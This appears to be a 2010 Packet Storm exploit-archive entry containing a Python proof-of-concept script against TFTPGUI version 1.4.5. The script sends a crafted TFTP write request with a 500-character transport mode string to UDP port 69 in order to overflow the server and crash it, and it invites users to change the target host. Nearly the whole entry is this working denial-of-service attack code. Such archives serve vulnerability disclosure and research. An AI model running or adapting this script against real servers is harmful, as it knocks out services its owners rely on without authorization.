TFTPGUI Long Transport Mode Overflow

2010-05-03T00:00:00
ID PACKETSTORM:89112
Type packetstorm
Reporter Jeremiah Talamantes
Modified 2010-05-03T00:00:00

Description

                                        
                                            `# Exploit Title: TFTPGUI Long Transport Mode Overflow  
# Date: 5/1/2010  
# Author: Jeremiah Talamantes  
# Software Link: http://sourceforge.net/projects/tftputil/files/TFTPUtil/TFTPUtil%20Version%201.4.5/TFTPUtil_GUI_Version_1.4.5_Binary_Installer.exe/download  
# Version: 1.4.5  
# Tested on: Windows XP, SP2 (En)  
# CVE : N/A  
  
#!/usr/bin/python  
print "\n#################################################################"  
print "## RedTeam Security ##"  
print "## TFTPGUI Long Transport Mode Overflow ##"  
print "## Version 1.4.5 ##"  
print "## LIST Vulnerability ##"  
print "## ##"  
print "## Jeremiah Talamantes ##"  
print "## labs@redteamsecure.com ##"  
print "################################################################# \n"  
  
import socket  
import sys  
  
# Change these values to suit your needs  
host = '192.168.1.108'  
port = 69  
  
try:  
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)  
except:  
print "Error: unable to connect."  
sys.exit(1)  
  
# Creating the overly long transport mode string   
fn = "A"  
md = "A" * 500  
stuff = "\x00\x02" + fn + "\0" + md + "\0"  
  
# Send data  
s.sendto(stuff, (host, port))  
print "Check to see if TFTPGUI is still running..."  
  
# End  
`